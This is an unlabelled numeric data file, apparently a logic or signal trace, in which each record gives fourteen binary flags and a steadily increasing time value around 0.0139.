1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852724e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.3852728e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3852732e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3852748e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3852772e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852780e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852824e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852848e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852876e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852900e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852920e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853048e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853076e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853096e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853172e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3853176e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3853220e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3853244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853296e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853320e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853420e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853448e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853624e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853648e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853700e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853724e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.3853728e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3853732e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3853748e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3853772e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3853824e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3853848e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,1.3853856e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3853972e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3853996e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854024e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854048e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854172e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854196e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854224e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854304e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854376e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854400e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854576e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854600e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854724e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854776e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3854952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3854976e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855000e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855056e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855084e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855108e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855132e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855156e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855232e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855256e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855284e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855332e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855356e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855432e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855456e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855484e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855508e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855532e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855632e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855656e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855884e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855908e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3855928e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3855952e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856008e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856032e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856144e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856164e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856188e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856212e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856236e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856256e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856336e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856356e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856416e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856436e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856460e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856484e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856508e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856528e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856552e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856572e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856596e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856664e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856732e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856756e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856780e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856804e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856824e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856936e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3856956e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3856980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857048e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857072e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857092e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857116e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857140e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857168e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857196e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857220e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857244e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857268e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857292e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857316e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857344e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857368e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857420e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857444e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857468e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857492e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857516e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857568e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3857620e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3857644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3982364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3982548e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3982572e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,1.3982600e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3982628e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3982924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3982952e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3982996e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3983020e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3983044e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3983072e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3983096e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3983124e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3983148e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3983172e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983196e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983224e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983352e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983376e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983428e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983452e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983476e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983500e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983524e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983580e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983680e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983704e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983780e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983804e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983832e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983884e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3983956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3983980e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984032e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984056e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984084e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984132e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984188e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984208e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984360e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984412e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984436e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984484e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3984488e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3984532e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3984560e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,1.3984564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984568e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984584e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984608e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984636e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984660e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984684e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984732e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984812e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,1.3984836e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3984840e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3984860e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3984884e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984892e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3984956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3984984e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985036e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985060e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985084e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985160e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985184e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985236e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985260e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985308e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985360e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985408e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3985436e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3985484e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3985508e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985516e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985612e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985632e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985684e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985780e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985804e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985832e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985856e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985884e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3985932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3985980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986004e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3986012e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3986032e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3986056e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986064e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986084e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,1.3986108e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3986112e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3986156e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3986180e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986204e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986232e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986256e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986380e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986484e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986632e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986656e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986760e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986784e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986808e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986884e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3986956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3986984e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987008e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987032e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987084e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987108e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987156e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987184e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987208e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987232e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987308e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987356e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987432e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987456e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987484e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987508e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987532e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987632e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987656e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987784e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987804e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987832e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987856e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987884e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3987956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3987984e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988004e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988032e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988056e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988084e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988108e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988156e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988184e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988204e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988232e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988256e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988308e-02 